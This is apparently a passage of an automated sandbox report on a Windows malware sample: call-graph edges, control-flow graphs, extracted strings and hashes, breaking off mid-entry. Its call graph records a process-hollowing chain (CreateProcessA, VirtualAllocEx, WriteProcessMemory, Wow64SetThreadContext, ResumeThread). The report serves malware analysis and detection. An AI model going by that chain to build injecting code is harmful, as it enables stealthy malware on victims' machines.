46462->46464 46463->46438 46464->46463 46466 2f71c14 CallWindowProcW 46465->46466 46467 2f74c6a 46466->46467 46467->46461 46520 725f5f0 46521 725f60a 46520->46521 46522 725f62e 46521->46522 46540 50204a7 46521->46540 46544 5020006 46521->46544 46549 5020801 46521->46549 46552 5020340 46521->46552 46556 5020040 46521->46556 46561 50204c2 46521->46561 46565 502075d 46521->46565 46570 502087e 46521->46570 46574 5020377 46521->46574 46579 5020356 46521->46579 46583 50202ec 46521->46583 46586 502098c 46521->46586 46590 50206cc 46521->46590 46595 502024b 46521->46595 46600 502012b 46521->46600 46605 50202ca 46521->46605 46609 502062a 46521->46609 46541 50204ad 46540->46541 46614 725dee0 46541->46614 46546 5020040 46544->46546 46545 5020117 46545->46522 46546->46545 46618 725e7e8 46546->46618 46622 725df90 46549->46622 46553 50202cd 46552->46553 46555 725dee0 ResumeThread 46553->46555 46554 5020bdb 46554->46554 46555->46554 46558 5020073 46556->46558 46557 5020117 46557->46522 46558->46557 46560 725e7e8 CreateProcessA 46558->46560 46559 502022b 46560->46559 46562 50204da 46561->46562 46626 5020fa0 46561->46626 46630 5020f9c 46561->46630 46567 5020253 46565->46567 46566 50205e0 46566->46522 46567->46566 46634 725e560 46567->46634 46638 725e4a0 46567->46638 46571 5020800 46570->46571 46573 725df90 Wow64SetThreadContext 46571->46573 46572 502081b 46573->46572 46575 5020253 46574->46575 46575->46574 46576 50205e0 46575->46576 46577 725e560 WriteProcessMemory 46575->46577 46578 725e4a0 VirtualAllocEx 46575->46578 46576->46522 46577->46575 46578->46575 46580 502035f 46579->46580 46582 725e560 WriteProcessMemory 46580->46582 46581 502085e 46582->46581 46585 725e560 WriteProcessMemory 46583->46585 46584 502031a 46584->46522 46585->46584 46642 725e650 46586->46642 46588 5020466 46588->46522 46592 5020253 46590->46592 46591 50205e0 46591->46522 46592->46590 46592->46591 46593 725e560 WriteProcessMemory 46592->46593 46594 725e4a0 VirtualAllocEx 46592->46594 46593->46592 46594->46592 46597 5020253 46595->46597 46596 50205e0 46596->46522 46597->46596 46598 725e4a0 VirtualAllocEx 46597->46598 46599 725e560 WriteProcessMemory 46597->46599 46598->46597 46599->46597 46602 502011f 46600->46602 46601 5020117 46601->46522 46602->46601 46604 725e7e8 CreateProcessA 46602->46604 46603 502022b 46604->46603 46606 50202e4 46605->46606 46608 725dee0 ResumeThread 46606->46608 46607 5020bdb 46608->46607 46613 725e4a0 VirtualAllocEx 46609->46613 46610 5020253 46610->46609 46611 50205e0 46610->46611 46612 725e560 WriteProcessMemory 46610->46612 46611->46522 46612->46610 46613->46610 46615 725df20 ResumeThread 46614->46615 46617 5020bdb 46615->46617 46619 725e871 CreateProcessA 46618->46619 46621 725ea33 46619->46621 46623 725dfd5 Wow64SetThreadContext 46622->46623 46625 502081b 46623->46625 46627 5020fa5 46626->46627 46629 725df90 Wow64SetThreadContext 46627->46629 46628 5020fcb 46628->46562 46629->46628 46631 5020fa0 46630->46631 46633 725df90 Wow64SetThreadContext 46631->46633 46632 5020fcb 46632->46562 46633->46632 46635 725e5a8 WriteProcessMemory 46634->46635 46637 725e5ff 46635->46637 46637->46567 46639 725e4e0 VirtualAllocEx 46638->46639 46641 725e51d 46639->46641 46641->46567 46643 725e69b ReadProcessMemory 46642->46643 46645 5020915 46643->46645 46645->46586 46645->46588 46491 13e4f98 46492 13e4faa 46491->46492 46493 13e4fc5 46492->46493 46495 13e5391 46492->46495 46496 13e53b5 46495->46496 46500 13e548f 46496->46500 46504 13e54a0 46496->46504 46502 13e54c7 46500->46502 46501 13e55a4 46501->46501 46502->46501 46508 13e4d48 46502->46508 46505 13e54c7 46504->46505 46506 13e4d48 CreateActCtxA 46505->46506 46507 13e55a4 46505->46507 46506->46507 46509 13e6530 CreateActCtxA 46508->46509 46511 13e65f3 46509->46511 46514 13edf88 DuplicateHandle 46515 13ee01e 46514->46515 46516 2f726b0 46517 2f72718 CreateWindowExW 46516->46517 46519 2f727d4 46517->46519 46646 5020fe8 46647 5021173 46646->46647 46648 502100e 46646->46648 46648->46647 46651 5021670 PostMessageW 46648->46651 46653 5021668 PostMessageW 46648->46653 46652 50216dc 46651->46652 46652->46648 46654 50216dc 46653->46654 46654->46648 46468 13eb9b0 46469 13eb9bf 46468->46469 46471 13eba97 46468->46471 46472 13ebab9 46471->46472 46473 13ebadc 46471->46473 46472->46473 46479 13ebd30 46472->46479 46483 13ebd40 46472->46483 46473->46469 46474 13ebad4 46474->46473 46475 13ebce0 GetModuleHandleW 46474->46475 46476 13ebd0d 46475->46476 46476->46469 46480 13ebd54 46479->46480 46482 13ebd79 46480->46482 46487 13eb7a0 46480->46487 46482->46474 46484 13ebd54 46483->46484 46485 13eb7a0 LoadLibraryExW 46484->46485 46486 13ebd79 46484->46486 46485->46486 46486->46474 46488 13ebf20 LoadLibraryExW 46487->46488 46490 13ebf99 46488->46490 46490->46482 46655 13edd40 46656 13edd86 GetCurrentProcess 46655->46656 46658 13eddd8 GetCurrentThread 46656->46658 46659 13eddd1 46656->46659 46660 13ede0e 46658->46660 46661 13ede15 GetCurrentProcess 46658->46661 46659->46658 46660->46661 46664 13ede4b 46661->46664 46662 13ede73 GetCurrentThreadId 46663 13edea4 46662->46663 46664->46662 46665 2f77688 46666 2f776b5 46665->46666 46670 2f7db87 46666->46670 46681 2f7db98 46666->46681 46667 2f77a74 46672 2f7dbad 46670->46672 46671 2f7dc33 46679 2f7db87 GetCurrentThreadId 46671->46679 46680 2f7db98 GetCurrentThreadId 46671->46680 46672->46671 46674 2f7dc68 46672->46674 46673 2f7dc3d 46673->46667 46678 2f7dd6c 46674->46678 46692 2f7d0e4 46674->46692 46676 2f7dd90 46677 2f7d0e4 GetCurrentThreadId 46676->46677 46677->46678 46678->46667 46679->46673 46680->46673 46683 2f7dbad 46681->46683 46682 2f7dc33 46690 2f7db87 GetCurrentThreadId 46682->46690 46691 2f7db98 GetCurrentThreadId 46682->46691 46683->46682 46686 2f7dc68 46683->46686 46684 2f7dc3d 46684->46667 46685 2f7dd6c 46685->46667 46686->46685 46687 2f7d0e4 GetCurrentThreadId 46686->46687 46688 2f7dd90 46687->46688 46689 2f7d0e4 GetCurrentThreadId 46688->46689 46689->46685 46690->46684 46691->46684 46693 2f7d0ef 46692->46693 46694 2f7e0af GetCurrentThreadId 46693->46694 46695 2f7e09a 46693->46695 46694->46695 46695->46676

                                                    Executed Functions

                                                    Function 055BA230 Relevance: 8.5, Strings: 6, Instructions: 1042COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 294 55ba230-55ba251 295 55ba258-55ba344 294->295 296 55ba253 294->296 298 55ba34a-55ba4a1 295->298 299 55bab76-55bab9e 295->299 296->295 343 55ba4a7-55ba502 298->343 344 55bab44-55bab74 298->344 302 55bb287-55bb290 299->302 304 55babac-55babb5 302->304 305 55bb296-55bb2ad 302->305 306 55babbc-55bacb0 304->306 307 55babb7 304->307 326 55bacda 306->326 327 55bacb2-55bacbe 306->327 307->306 328 55bace0-55bad00 326->328 329 55bacc8-55bacce 327->329 330 55bacc0-55bacc6 327->330 334 55bad02-55bad5b 328->334 335 55bad60-55badda 328->335 332 55bacd8 329->332 330->332 332->328 349 55bb284 334->349 355 55baddc-55bae2f 335->355 356 55bae31-55bae74 335->356 350 55ba507-55ba512 343->350 351 55ba504 343->351 344->299 349->302 354 55baa56-55baa5c 350->354 351->350 357 55baa62-55baadf 354->357 358 55ba517-55ba535 354->358 383 55bae7f-55bae85 355->383 356->383 401 55bab2e-55bab34 357->401 361 55ba58c-55ba5a1 358->361 362 55ba537-55ba53b 358->362 367 55ba5a8-55ba5be 361->367 368 55ba5a3 361->368 362->361 364 55ba53d-55ba548 362->364 369 55ba57e-55ba584 364->369 372 55ba5c0 367->372 373 55ba5c5-55ba5dc 367->373 368->367 376 55ba54a-55ba54e 369->376 377 55ba586-55ba587 369->377 372->373 374 55ba5de 373->374 375 55ba5e3-55ba5f9 373->375 374->375 381 55ba5fb 375->381 382 55ba600-55ba607 375->382 379 55ba550 376->379 380 55ba554-55ba56c 376->380 384 55ba60a-55ba67b 377->384 379->380 386 55ba56e 380->386 387 55ba573-55ba57b 380->387 381->382 382->384 388 55baedc-55baee8 383->388 389 55ba67d 384->389 390 55ba691-55ba809 384->390 386->387 387->369 393 55baeea-55baf72 388->393 394 55bae87-55baea9 388->394 389->390 392 55ba67f-55ba68b 389->392 399 55ba80b 390->399 400 55ba81f-55ba95a 390->400 392->390 423 55bb0f7-55bb100 393->423 395 55baeab 394->395 396 55baeb0-55baed9 394->396 395->396 396->388 399->400 404 55ba80d-55ba819 399->404 413 55ba9be-55ba9d3 400->413 414 55ba95c-55ba960 400->414 405 55baae1-55bab2b 401->405 406 55bab36-55bab3c 401->406 404->400 405->401 406->344 418 55ba9da-55ba9fb 413->418 419 55ba9d5 413->419 414->413 416 55ba962-55ba971 414->416 422 55ba9b0-55ba9b6 416->422 420 55ba9fd 418->420 421 55baa02-55baa21 418->421 419->418 420->421 427 55baa28-55baa48 421->427 428 55baa23 421->428 429 55ba9b8-55ba9b9 422->429 430 55ba973-55ba977 422->430 425 55baf77-55baf8c 423->425 426 55bb106-55bb161 423->426 433 55baf8e 425->433 434 55baf95-55bb0eb 425->434 452 55bb198-55bb1c2 426->452 453 55bb163-55bb196 426->453 435 55baa4a 427->435 436 55baa4f 427->436 428->427 437 55baa53 429->437 431 55ba979-55ba97d 430->431 432 55ba981-55ba9a2 430->432 431->432 439 55ba9a9-55ba9ad 432->439 440 55ba9a4 432->440 433->434 441 55baf9b-55bafdb 433->441 442 55bb06a-55bb0aa 433->442 443 55bafe0-55bb020 433->443 444 55bb025-55bb065 433->444 454 55bb0f1 434->454 435->436 436->437 437->354 439->422 440->439 441->454 442->454 443->454 444->454 461 55bb1cb-55bb25e 452->461 453->461 454->423 465 55bb265-55bb27d 461->465 465->349
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2006803717.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_55b0000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 4'sq$TJxq$Tesq$eE$pwq$xbvq
                                                    • API String ID: 0-2956496829
                                                    • Opcode ID: 1ea2d0bc0a4bf932b1f21dd852ff158e6dafd2f2aa8328fb1cb1624215508c5e
                                                    • Instruction ID: 8a50dc6a549bfeee86c8e2b952e4e40b0bdc82f16533b8ee0fbf685afdce1c4f
                                                    • Opcode Fuzzy Hash: 1ea2d0bc0a4bf932b1f21dd852ff158e6dafd2f2aa8328fb1cb1624215508c5e
                                                    • Instruction Fuzzy Hash: 75B2C175E00628CFDB64CF69C984AD9BBB2FF89304F1581E9D509AB265DB319E81CF40
                                                    Function 02F77688 Relevance: .9, Instructions: 859COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2005324672.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_2f70000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0fa10f6ebf26eb30b200bc23e1e63b6d53e87c8b32ae80479dd88ae26a77f94b
                                                    • Instruction ID: f9ee6d88e5ac75f7b84149e682ea5d1c9d6d6734d0296ee4dfaf82c57ea20fed
                                                    • Opcode Fuzzy Hash: 0fa10f6ebf26eb30b200bc23e1e63b6d53e87c8b32ae80479dd88ae26a77f94b
                                                    • Instruction Fuzzy Hash: 31928374A11218CFDB64EF68CC94B99B7B2BF89300F1091EAD509A7365DB31AE81CF54
                                                    Function 02F77678 Relevance: .8, Instructions: 806COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2005324672.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_2f70000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0a0def25a185a75ca8df526d16a6ca11e844d8ca0cd2c75b14fd7788ad8648aa
                                                    • Instruction ID: 0dbdced5797d6d75d3b3c2f693ab2bdb6bae373325c666d4d2838aa2a8f843c3
                                                    • Opcode Fuzzy Hash: 0a0def25a185a75ca8df526d16a6ca11e844d8ca0cd2c75b14fd7788ad8648aa
                                                    • Instruction Fuzzy Hash: 42828474A11218CFDB64EF68CC94B99B7B2BF89301F1091EAD509A7365DB31AE81CF50
                                                    Function 0502211C Relevance: .4, Instructions: 404COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2006739565.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5020000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7c039934acbc5920d311721993c77d591db86b3410bde1fdea55f9e0b13c1a47
                                                    • Instruction ID: 5d51713934ebce3a635120a633307593bed4e1021b23504aa8b18a888b360da4
                                                    • Opcode Fuzzy Hash: 7c039934acbc5920d311721993c77d591db86b3410bde1fdea55f9e0b13c1a47
                                                    • Instruction Fuzzy Hash: ABE1BE3170032A8FDB25DBB9E464BAEB7F7AF89305F14846DD1469B290CB35E901CB51
                                                    Function 0729BC28 Relevance: .2, Instructions: 167COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2007574800.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7290000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 504f1912907c619fc9efa4319f7a6953e0ddf69b65537b5099f6861296e5fb23
                                                    • Instruction ID: 5c9d9ee5a643f7ecac26d6ec8761f959bc7671bd12aada587229d9b1adaa730c
                                                    • Opcode Fuzzy Hash: 504f1912907c619fc9efa4319f7a6953e0ddf69b65537b5099f6861296e5fb23
                                                    • Instruction Fuzzy Hash: A461C4B5E102198FDF04DFEAD8446AEBBB2FF89300F14D02AE515AB258DB345946CF50
                                                    Function 05020040 Relevance: .2, Instructions: 157COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2006739565.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5020000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6e8ea5e202338e252f12ad7d2750ca3e391f3d71f53233e250bd5ae8440a7906
                                                    • Instruction ID: 21902125c375d7179a3d33a0ae20dea0232cee8ef3c071f8aa549849b4c02ad4
                                                    • Opcode Fuzzy Hash: 6e8ea5e202338e252f12ad7d2750ca3e391f3d71f53233e250bd5ae8440a7906
                                                    • Instruction Fuzzy Hash: 9D61E371E44729CBEB28CF66D8547EDFBB6BF89300F14C1AAD409A6250EB705A85CF41
                                                    Function 0729C0C8 Relevance: .2, Instructions: 153COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2007574800.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7290000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 71aaf283900b535c07d20f14bd605f59e04c3b99864c773ef2898982f69355a3
                                                    • Instruction ID: 4c7de15dd5bf358b716e5f12cc861bd6611e6823205811bdf133d47b70094001
                                                    • Opcode Fuzzy Hash: 71aaf283900b535c07d20f14bd605f59e04c3b99864c773ef2898982f69355a3
                                                    • Instruction Fuzzy Hash: C151D6B4E151199BCB04DFAAD5809AEFBF6FF88310F18D125E418A7355DB309982CBA0
                                                    Function 013EDD31 Relevance: 6.1, APIs: 4, Instructions: 134threadCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 574 13edd31-13eddcf GetCurrentProcess 578 13eddd8-13ede0c GetCurrentThread 574->578 579 13eddd1-13eddd7 574->579 580 13ede0e-13ede14 578->580 581 13ede15-13ede49 GetCurrentProcess 578->581 579->578 580->581 583 13ede4b-13ede51 581->583 584 13ede52-13ede6d call 13edf10 581->584 583->584 586 13ede73-13edea2 GetCurrentThreadId 584->586 588 13edeab-13edf0d 586->588 589 13edea4-13edeaa 586->589 589->588
                                                    APIs
                                                    • GetCurrentProcess.KERNEL32 ref: 013EDDBE
                                                    • GetCurrentThread.KERNEL32 ref: 013EDDFB
                                                    • GetCurrentProcess.KERNEL32 ref: 013EDE38
                                                    • GetCurrentThreadId.KERNEL32 ref: 013EDE91
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2004768882.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_13e0000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID: Current$ProcessThread
                                                    • String ID:
                                                    • API String ID: 2063062207-0
                                                    • Opcode ID: 6ff1891b865cd0918345ee3f0595eddea2bd38c95cafbb7e8a5da4886d176111
                                                    • Instruction ID: 19b7d3c72e0bd5b48c45d59cdb6eeb0aa8b95f127eb50d7c7b1e7d6bc8a019f1
                                                    • Opcode Fuzzy Hash: 6ff1891b865cd0918345ee3f0595eddea2bd38c95cafbb7e8a5da4886d176111
                                                    • Instruction Fuzzy Hash: DB5165B090034A8FDB18DFA9D948BAEBFF5BF88318F24845AE409A7290C7355944CB61
                                                    Function 013EDD40 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 596 13edd40-13eddcf GetCurrentProcess 600 13eddd8-13ede0c GetCurrentThread 596->600 601 13eddd1-13eddd7 596->601 602 13ede0e-13ede14 600->602 603 13ede15-13ede49 GetCurrentProcess 600->603 601->600 602->603 605 13ede4b-13ede51 603->605 606 13ede52-13ede6d call 13edf10 603->606 605->606 608 13ede73-13edea2 GetCurrentThreadId 606->608 610 13edeab-13edf0d 608->610 611 13edea4-13edeaa 608->611 611->610
                                                    APIs
                                                    • GetCurrentProcess.KERNEL32 ref: 013EDDBE
                                                    • GetCurrentThread.KERNEL32 ref: 013EDDFB
                                                    • GetCurrentProcess.KERNEL32 ref: 013EDE38
                                                    • GetCurrentThreadId.KERNEL32 ref: 013EDE91
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2004768882.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_13e0000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID: Current$ProcessThread
                                                    • String ID:
                                                    • API String ID: 2063062207-0
                                                    • Opcode ID: ef653553bc03db20a959939833f79bc9a2a6d4690f8e2a4bd0cacb5f0a3dacd3
                                                    • Instruction ID: 784b8f8f82676f2ff8a07829856cf919f0686697266577fe98df8d3f1b3b38d9
                                                    • Opcode Fuzzy Hash: ef653553bc03db20a959939833f79bc9a2a6d4690f8e2a4bd0cacb5f0a3dacd3
                                                    • Instruction Fuzzy Hash: FB5155B0900349CFDB18DFA9D948B9EBBF5BF88318F248459E409A7390D7346944CB65
                                                    Function 055B9E93 Relevance: 5.2, Strings: 4, Instructions: 174COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 618 55b9e93-55b9f60 627 55b9f8a 618->627 628 55b9f62-55b9f6e 618->628 631 55b9f90-55ba02e 627->631 629 55b9f78-55b9f7e 628->629 630 55b9f70-55b9f76 628->630 632 55b9f88 629->632 630->632 639 55ba058 631->639 640 55ba030-55ba03c 631->640 632->631 643 55ba05e-55ba084 call 72998f0 639->643 641 55ba03e-55ba044 640->641 642 55ba046-55ba04c 640->642 644 55ba056 641->644 642->644 666 55ba089 call 729adf8 643->666 667 55ba089 call 729b038 643->667 668 55ba089 call 72991dc 643->668 669 55ba089 call 729b070 643->669 644->643 646 55ba08f-55ba1ac call 729bc28 call 725c9d8 call 729c3d8 663 55ba1ae call 55bb418 646->663 664 55ba1ae call 55bb408 646->664 659 55ba1b4-55ba1bc 663->659 664->659 666->646 667->646 668->646 669->646
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2006803717.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_55b0000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $sq$$sq$$sq$$sq
                                                    • API String ID: 0-2855845837
                                                    • Opcode ID: a9d683a637264f2c38ad4a469cf512723a3b6e46442ec880e7b0d049474f52bd
                                                    • Instruction ID: 104b23c26485f9ecbd0a886bcb54d15d447e7ffce5a0d5ea101f24da1dec67b0
                                                    • Opcode Fuzzy Hash: a9d683a637264f2c38ad4a469cf512723a3b6e46442ec880e7b0d049474f52bd
                                                    • Instruction Fuzzy Hash: 3D919274A11228CFDB64DFA8D894B9DBBB2FB49200F1081AAE50DA7345DB309E85DF51
                                                    Function 055B2060 Relevance: 2.7, Strings: 2, Instructions: 212COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 692 55b2060-55b20c2 call 55b1434 698 55b2128-55b2154 692->698 699 55b20c4-55b20c6 692->699 700 55b215b-55b2163 698->700 699->700 701 55b20cc-55b20d8 699->701 706 55b216a-55b22a5 700->706 701->706 707 55b20de-55b2119 call 55b1f18 701->707 725 55b22ab-55b22b9 706->725 718 55b211e-55b2127 707->718 726 55b22bb-55b22c1 725->726 727 55b22c2-55b2308 725->727 726->727 732 55b230a-55b230d 727->732 733 55b2315 727->733 732->733 734 55b2316 733->734 734->734
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2006803717.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_55b0000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Hwq$Hwq
                                                    • API String ID: 0-741242263
                                                    • Opcode ID: 999a7c9edff052c3063a4199145391fe5ad575994b8c2ea1f3c2d3f7e0a0044a
                                                    • Instruction ID: 0816212dd6d1616d01cfa08ecb317e036cad2cf51fa7839c045e5b4a131be271
                                                    • Opcode Fuzzy Hash: 999a7c9edff052c3063a4199145391fe5ad575994b8c2ea1f3c2d3f7e0a0044a
                                                    • Instruction Fuzzy Hash: FB814D74E002198FDF18DFA9C8946EEBBF6BF88310F14852AE405EB354DB749945CBA1
                                                    Function 0729EB88 Relevance: 2.7, Strings: 2, Instructions: 178COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 735 729eb88-729ebab 736 729ebad 735->736 737 729ebb2-729ed11 735->737 736->737 753 729ec6d-729ec71 737->753 754 729ec73-729ed86 753->754 755 729ec56-729eccf call 729eb18 753->755 771 729ed88 call 55bbfc9 754->771 772 729ed88 call 55bbc09 754->772 773 729ed88 call 55bbebf 754->773 774 729ed88 call 55bbcfe 754->774 775 729ed88 call 55bc04d 754->775 776 729ed88 call 55bb761 754->776 777 729ed88 call 55bb770 754->777 778 729ed88 call 55bb836 754->778 765 729ebef-729ebf4 755->765 766 729ecd5-729ecdb 755->766 768 729ec45-729ec49 765->768 769 729ebf6-729ebf7 765->769 766->765 768->753 769->768 770 729ed8e-729ed98 771->770 772->770 773->770 774->770 775->770 776->770 777->770 778->770
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2007574800.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7290000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Tesq$Tesq
                                                    • API String ID: 0-1365298620
                                                    • Opcode ID: f872647636b0bde7d34288da86029d030832155d6efd469885196cc05fa5aa53
                                                    • Instruction ID: 6853c8aa0d41ab8c7ac773391b86e0c7c43f9643f516b024c9cbf6700c2602b2
                                                    • Opcode Fuzzy Hash: f872647636b0bde7d34288da86029d030832155d6efd469885196cc05fa5aa53
                                                    • Instruction Fuzzy Hash: 4361D5B5E24219CFDF08DFAAC8846ADFBB6BF89300F158029E419AB355DB715905CF50
                                                    Function 055B9BCF Relevance: 2.7, Strings: 2, Instructions: 174COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 779 55b9bcf-55b9c0b 780 55b9c0d 779->780 781 55b9c12-55b9c76 779->781 780->781 814 55b9c7b call 55bb418 781->814 815 55b9c7b call 55bb408 781->815 784 55b9c81 816 55b9c82 call 55bb490 784->816 817 55b9c82 call 55bb480 784->817 785 55b9c88-55b9cff call 55b91fc 794 55b9d00-55b9d43 785->794 797 55b9d6e-55b9d80 794->797 798 55b9d45-55b9d6d 794->798 797->794 799 55b9d86-55b9db5 call 725c9d8 797->799 798->797 804 55b9dbb-55b9e11 799->804 809 55b9e3d 804->809 810 55b9e13-55b9e3c 804->810 812 55b9e3e 809->812 810->809 812->812 814->784 815->784 816->785 817->785
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2006803717.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_55b0000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Tesq$Tesq
                                                    • API String ID: 0-1365298620
                                                    • Opcode ID: c42fac18bb238fc923e556bd78fe5f0115f4f4d49432a9f0fd7a71ce7509e380
                                                    • Instruction ID: dd3a277f5e892cbc163be00de8c23ab05451f9ab96d8bd9fca43af848b18420a
                                                    • Opcode Fuzzy Hash: c42fac18bb238fc923e556bd78fe5f0115f4f4d49432a9f0fd7a71ce7509e380
                                                    • Instruction Fuzzy Hash: 9571F674E002488FEB18DFA9D9947DEBBF2BB89300F20912AD509AB388DB705945CF50
                                                    Function 055B9BE0 Relevance: 2.7, Strings: 2, Instructions: 171COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 819 55b9be0-55b9c0b 820 55b9c0d 819->820 821 55b9c12-55b9c76 819->821 820->821 854 55b9c7b call 55bb418 821->854 855 55b9c7b call 55bb408 821->855 824 55b9c81 856 55b9c82 call 55bb490 824->856 857 55b9c82 call 55bb480 824->857 825 55b9c88-55b9cff call 55b91fc 834 55b9d00-55b9d43 825->834 837 55b9d6e-55b9d80 834->837 838 55b9d45-55b9d6d 834->838 837->834 839 55b9d86-55b9db5 call 725c9d8 837->839 838->837 844 55b9dbb-55b9e11 839->844 849 55b9e3d 844->849 850 55b9e13-55b9e3c 844->850 852 55b9e3e 849->852 850->849 852->852 854->824 855->824 856->825 857->825
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2006803717.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_55b0000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Tesq$Tesq
                                                    • API String ID: 0-1365298620
                                                    • Opcode ID: ccc23bd4f78fd2558b3a4626b576752b1d69550106a02a6b1caad7d958c6886a
                                                    • Instruction ID: 3e8cec32843966c13c1f1a66934ea3843fccc75245243cd9183ac1263775a19c
                                                    • Opcode Fuzzy Hash: ccc23bd4f78fd2558b3a4626b576752b1d69550106a02a6b1caad7d958c6886a
                                                    • Instruction Fuzzy Hash: CE71E674E002588FDB18DFA9D9547DEBBF2FB89300F20912AD409AB388DB745945CF50
                                                    Function 0725E7E8 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
